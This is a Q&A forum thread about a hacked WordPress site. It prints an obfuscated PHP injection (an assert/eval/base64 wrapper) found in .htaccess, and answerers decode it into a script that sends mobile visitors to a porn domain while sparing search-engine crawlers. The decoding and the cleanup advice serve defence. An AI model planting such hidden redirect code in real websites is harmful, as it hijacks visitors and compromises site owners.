I am having a website (wordpress) and hosted on the shared hosting server, the website is opening fine on the desktop and laptop, but when we open it on the mobile some porn site is opening and even the code of .htaccess file is changed.

The code is

<?php
$_ = strrev("tress\x61"); @$_("e\166a\154\050b\141\163\145\066\064\137\144\145c\157\144\145\050'aWYgKChwcmVnX21hdGNoKCcvdGV4dFwvdm5kLndhcC53bWx8YXBwbGljYXRpb25cL3ZuZC53YXAueGh0bWxcK3htbC9zaScsIEAkX1NFUlZFUlsnSFRUUF9BQ0NFUFQnXSkgfHwgcHJlZ19tYXRjaCgnL2FsY2F0ZWx8YW1vaXxhbmRyb2lkfGF2YW50Z298YmxhY2tiZXJyeXxiZW5xfGNlbGx8Y3JpY2tldHxkb2NvbW98ZWxhaW5lfGh0Y3xpZW1vYmlsZXxpcGhvbmV8aXBhZHxpcGFxfGlwb2R8ajJtZXxqYXZhfG9wZXJhLm1pbml8bWlkcHxtbXB8bW9iaXxtb3Rvcm9sYXxuZWMtfG5va2lhfHBhbG18cGFuYXNvbmljfHBoaWxpcHN8cGhvbmV8c2FnZW18c2hhcnB8c2llLXxzbWFydHBob25lfHNvbnl8c3ltYmlhbnx0LW1vYmlsZXx0ZWx1c3x1cFwuYnJvd3Nlcnx1cFwubGlua3x2b2RhZm9uZXx3YXB8d2Vib3N8d2lyZWxlc3N8eGRhfHhvb218enRlL3NpJywgQCRfU0VSVkVSWydIVFRQX1VTRVJfQUdFTlQnXSkgfHwgcHJlZ19tYXRjaCgnL21zZWFyY2h8bVw/cT0vc2knLCBAJF9TRVJWRVJbJ0hUVFBfUkVGRVJFUiddKSkgJiYgIXByZWdfbWF0Y2goJy9tYWNpbnRvc2h8YW1lcmljYXxhdmFudHxkb3dubG9hZHx3aW5kb3dzXC1tZWRpYVwtcGxheWVyfHlhbmRleHxnb29nbGUvc2knLCBAJF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddKSkgeyBlY2hvICc8c2NyaXB0PndpbmRvdy5sb2NhdGlvbj0iaHR0cDovL21vYmlsZS1tb2JpLmluZm8vPzIiPC9zY3JpcHQ+JzsgZmx1c2goKTsgZXhpdDsgfQ=='\051\051\073");
?>

Please help,

Thanks in advance.

I have tried to decode above line of code $_ = strrev("tress\x61"); this line will return an assert function, and

@$_("e\166a\154\050b\141\163\145\066\064\137\144\145c\157\144\145\050'aWYgKChwcmVnX21hdGNoKCcvdGV4dFwvdm5kLndhcC53bWx8YXBwbGljYXRpb25cL3ZuZC53YXAueGh0bWxcK3htbC9zaScsIEAkX1NFUlZFUlsnSFRUUF9BQ0NFUFQnXSkgfHwgcHJlZ19tYXRjaCgnL2FsY2F0ZWx8YW1vaXxhbmRyb2lkfGF2YW50Z298YmxhY2tiZXJyeXxiZW5xfGNlbGx8Y3JpY2tldHxkb2NvbW98ZWxhaW5lfGh0Y3xpZW1vYmlsZXxpcGhvbmV8aXBhZHxpcGFxfGlwb2R8ajJtZXxqYXZhfG9wZXJhLm1pbml8bWlkcHxtbXB8bW9iaXxtb3Rvcm9sYXxuZWMtfG5va2lhfHBhbG18cGFuYXNvbmljfHBoaWxpcHN8cGhvbmV8c2FnZW18c2hhcnB8c2llLXxzbWFydHBob25lfHNvbnl8c3ltYmlhbnx0LW1vYmlsZXx0ZWx1c3x1cFwuYnJvd3Nlcnx1cFwubGlua3x2b2RhZm9uZXx3YXB8d2Vib3N8d2lyZWxlc3N8eGRhfHhvb218enRlL3NpJywgQCRfU0VSVkVSWydIVFRQX1VTRVJfQUdFTlQnXSkgfHwgcHJlZ19tYXRjaCgnL21zZWFyY2h8bVw/cT0vc2knLCBAJF9TRVJWRVJbJ0hUVFBfUkVGRVJFUiddKSkgJiYgIXByZWdfbWF0Y2goJy9tYWNpbnRvc2h8YW1lcmljYXxhdmFudHxkb3dubG9hZHx3aW5kb3dzXC1tZWRpYVwtcGxheWVyfHlhbmRleHxnb29nbGUvc2knLCBAJF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddKSkgeyBlY2hvICc8c2NyaXB0PndpbmRvdy5sb2NhdGlvbj0iaHR0cDovL21vYmlsZS1tb2JpLmluZm8vPzIiPC9zY3JpcHQ+JzsgZmx1c2goKTsgZXhpdDsgfQ=='\051\051\073");

is calling the assert function with following paramters.

eval(base64_decode('malicious code encoded as base64'))

so in full form it is as follows

assert( eval (base64_decode('malicious code encoded as base64')));

Part of malicious code is checking if the request came from any mobile device, tablet or ipad etc.

if ((preg_match('/text\/vnd.wap.wml|application\/vnd.wap.xhtml\+xml/si', @$_SERVER['HTTP_ACCEPT']) || preg_match('/alcatel|amoi|android|avantgo|blackberry|benq|cell|cricket|docomo|elaine|htc|iemobile|iphone|ipad|ipaq|ipod|j2me|java|opera.mini|midp|mmp|mobi|motorola|nec-|nokia|palm|panasonic|philips|phone|sagem|sharp|sie-|smartphone|sony|symbian|t-mobile|telus|up\.browser|up\.link|vodafone|wap|webos|wireless|xda|xoom|zte/si', @$_SERVER['HTTP_USER_AGENT']) || preg_match('/msearch|m\?q=/si', @$_SERVER['HTTP_REFERER'])) && !preg_match('/macintosh|america|avant|download|windows\-media\-player|yandex|google/si', @$_SERVER['HTTP_USER_AGENT'])) {

Conclusion This malicious code checks if the request is coming from a mobile device (Mobile, iPad or any tablet or a specific browser) then redirect this request.

You already found the problematic code, remove it from your directories, Server you are using for hosting, make sure its safe and have anti-virus, changing your passwords might help, also check if your system is embedding this code right when you upload to sever. It might not be server but your system.

Sorry for the problem, I have tried to decode your sample code.

It is:

if ((preg_match('/text\/vnd.wap.wml|application\/vnd.wap.xhtml\+xml/si', @$_SERVER['HTTP_ACCEPT']) || preg_match('/alcatel|amoi|android|avantgo|blackberry|benq|cell|cricket|docomo|elaine|htc|iemobile|iphone|ipad|ipaq|ipod|j2me|java|opera.mini|midp|mmp|mobi|motorola|nec-|nokia|palm|panasonic|philips|phone|sagem|sharp|sie-|smartphone|sony|symbian|t-mobile|telus|up\.browser|up\.link|vodafone|wap|webos|wireless|xda|xoom|zte/si', @$_SERVER['HTTP_USER_AGENT']) || preg_match('/msearch|m\?q=/si', @$_SERVER['HTTP_REFERER'])) && !preg_match('/macintosh|america|avant|download|windows\-media\-player|yandex|google/si', @$_SERVER['HTTP_USER_AGENT'])) { echo '<script>window.location="http://mobile-mobi.info/?2"</script>'; flush(); exit; }

This will redirect your visitors using mobile devices to certain site.

I suggest you use a malware scanner to check your site, I'm using clamav on server and avast on my local server to scan this code but see no virus detected (It is maybe their database is not update this malware information).

I suggest you still need to scan your site using one of malware scanner to scan your site to detect other virus. Additional you can use grep command to search any files has this code and remove it manual

The grep command is:

grep -R 'strrev("tress\x61");' /var/www/html

Replace /var/www/html by root path of your website.

P/S: Sorry if my English is not very good.

1. Update your wordpress to the latest version.
2. Update your plugins + themes.
3. Do fast "find and replace" on all of the files for similar codes.
4. change your passwords of wordpress/ftp/mysql/cp/webhost.
5. install antivirus on your wordpress (there are plenty you can find on their website).
6. ask your host customer support if they are getting attacks from hackers etc.

You should read the Hardening Wordpress guide - if your .htaccess was able to to be written by someone over the web, you have a fairly large security hole (if not multiple).

You definitely want to remove that code from your .htaccess, I did a bit of testing and it is in fact what is redirecting to a porn site. The first line assigns the value "assert" to the variable $_, and then uses that to run code that has been Base64 encoded. In a nutshell it does some matching on your HTTP_ACCEPT variables and makes sure you aren't coming from a search engine by checking out HTTP_USER_AGENT and HTTP_REFERER. The URL it redirects to just sends you to Google if you don't append a ?2 as a querystring variable.

Most wordpress hacks come from:

• timthumb image resizing plugin included with some theme
• uploadify plugin providing some upload function
• easy admin password (e.g. admin / p@ssw0rd)
• insecure permission allowing other users on a shared machine to either read the wp-config.php file, or make changes to your files (e.g. writeable directory).
• pre-existing access by the hacker (e.g. a backdoor script somewhere that you have been faithfully uploading)

If you cannot make your wp-config.php unreadable to other users on the machine, your problem will never be solved until you move the site.